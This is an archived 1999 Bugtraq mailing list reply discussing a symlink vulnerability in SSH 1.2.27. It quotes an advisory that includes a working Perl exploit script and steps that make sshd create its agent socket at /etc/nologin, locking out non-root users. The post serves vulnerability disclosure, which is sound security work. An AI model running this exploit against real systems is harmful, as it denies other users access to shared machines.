Bugtraq mailing list archives
Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]
From: tymm () COE MISSOURI EDU (Tymm Twillman)
Date: Sun, 26 Sep 1999 16:53:44 -0500
Hi, This is from a post I made to BugTraq on September 17, entitled "A few bugs...". If you're running Linux, it appears kernels pre 2.1 will not be affected by this bug as they do not follow symlinks when creating UNIX domain sockets (Solar Designer pointed this out after trying the exploit on a 2.0.38 kernel; I tested on a 2.0.34 kernel, and from there I'm generalizing). Other OSes, I'm not really sure; I don't have access to many platforms to test this on. It seems the SSH folks still haven't addressed this issue... *sigh*. -Tymm -- original message follows -- I recieved this email today and wanted to know if it is something to be of concern about. The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com SSH 1.2.27 vulnerable to a Denial of Service attack ------------------------------------------------------------ SSH has the option of setting up "authentication sockets", used to pass authentication keys securely. When this is used, a socket is created on both client and server machines; the socket created on the server uses an easy to guess filename (based on the PID). The creation of this socket is done while the server is acting as root and follows symlinks. ****************************** Exploit: - connect to remote machine - run the following script (creates symlinks for the next 50 PID's): ----- cut ----- #!/usr/bin/perl $pid = $$; $whoami = `whoami`; chop($whoami); mkdir("/tmp/ssh-$whoami", 0700); for ($i = $pid; $i < $pid+50; $i++) { symlink("/etc/nologin", "/tmp/ssh-$whoami/ssh-$i-agent"); } ----- cut ----- - on local machine, execute ssh-agent1; it will produce a few lines to cut and paste into your shell. - ssh1 to the remote machine; enter password The socket will have been created at /etc/nologin, preventing other non-root users from logging in. This connection too will die with "Logins are currently denied by /etc/nologin:" This was tested on a RedHat 6.0 machine, with standard configure/make/install installation of ssh. This script should work pretty well for systems that create processes where each PID is one greater than the last; other platforms may require modifications, or many-many more links, if they're exploitable.
Current thread:
- [Fwd: Truth about ssh 1.2.27 vulnerabiltiy] Marc SPARC (Sep 23)
- Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy] Tymm Twillman (Sep 26)
- Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy] Solar Designer (Sep 27)
- Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy] Dan Astoorian (Sep 27)
- ufsdump problem under Solaris 2.6 with ufs.c posix (Sep 27)
- Re: ufsdump problem under Solaris 2.6 with ufs.c Carson Gaspar (Sep 29)
- Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy] Sean-Paul Rees (Sep 27)
- Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy] Valdis.Kletnieks () VT EDU (Sep 27)
- Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy] Alan Cox (Sep 28)
- Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy] Mike Iglesias (Sep 28)
- Team Asylum: iHTML Merchant Vulnerabilities Team Asylum (Sep 28)
- Team Asylum: Yahoo! Messenger DoS Team Asylum (Sep 28)
- ufsdump problem under Solaris 2.6 with ufs.c posix (Sep 27)
(Thread continues...)
- Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy] Tymm Twillman (Sep 26)